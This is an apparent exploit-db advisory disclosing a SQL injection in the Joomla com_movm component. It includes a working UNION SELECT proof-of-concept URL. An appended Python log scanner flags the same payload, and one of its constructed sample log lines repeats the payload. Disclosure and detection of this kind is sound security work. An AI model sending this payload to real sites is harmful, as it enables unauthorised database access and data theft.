Joomla! Component com_movm – SQL Injection

  • Author: D4NB4R
    Date: 2012-08-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20170/
  • _______________________________________________________________________________________
    
     Exploit Title: Joomla com_movm SQL Injection
     
     Date: [31-07-2012]
     
     Author: Daniel Barragan "D4NB4R"
     
     Twitter: @D4NB4R
     
     site: http://poisonsecurity.wordpress.com/
     
     Vendor: http://www.movm.net/
     
     Version: 1.0 (Date Added 28 July 2012)
     
     License: Commercial $ 49.99 us
    
     Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/
    
     Tested on: [Linux(bt5)-Windows(7ultimate)]
     
     
     This component was released 3 days ago. Be careful when using this component.
     Movm is a Joomla extension for mobile devices that optimizes VirtueMart sites for iPhone, Android and BlackBerry.
     It is compatible with Joomla 2.5 and VirtueMart 2.0. It uses jQuery Mobile, so it gives a native feel to the web app.
     This component can be attacked from a mobile device by putting the following string in the URL field.
     
     PoC
    
     http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
    
    
     
    I'm not responsible for the use that is made of this.
    _______________________________________________________________________________________
    Daniel Barragan "D4NB4R" 2012
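
A log check a defender could run for the request pattern shown in the PoC, as an added example that is not part of the original advisory: it flags com_movm requests whose id parameter is not a plain integer. The combined access-log format, the sample lines, and the assumption that legitimate product ids are short decimal integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Aug/2012:10:01:12 +0000] "GET /index.php?option=com_movm&controller=product&task=product&id=42 HTTP/1.1" 200 5120
198.51.100.9 - - [02/Aug/2012:10:02:40 +0000] "GET /index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2 HTTP/1.1" 200 733
203.0.113.4 - - [02/Aug/2012:10:03:05 +0000] "GET /index.php?option=com_content&view=article&id=7:about HTTP/1.1" 200 9001
203.0.113.20 - - [02/Aug/2012:10:03:30 +0000] "GET /index.php?option=com_movm&controller=product&task=product&id=12abc HTTP/1.1" 200 5090
"""

# Captures the client address and the request target of one log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumption: legitimate product ids are short decimal integers.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_movm_requests(log_text):
    """Return (client, decoded_id) for com_movm requests whose id is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        # parse_qs URL-decodes values, so '+' and %2C show up as ' ' and ','.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_movm" not in params.get("option", []):
            continue  # other components may use non-numeric ids legitimately
        for raw_id in params.get("id", []):
            if not VALID_ID_RE.fullmatch(raw_id):
                hits.append((client, raw_id))
    return hits


if __name__ == "__main__":
    for client, raw_id in suspicious_movm_requests(SAMPLE_LOG):
        print(f"{client}\tid={raw_id!r}")
```

This only detects the pattern in logs; the fix belongs in the component, which should cast id to an integer or bind it as a query parameter before it reaches the database.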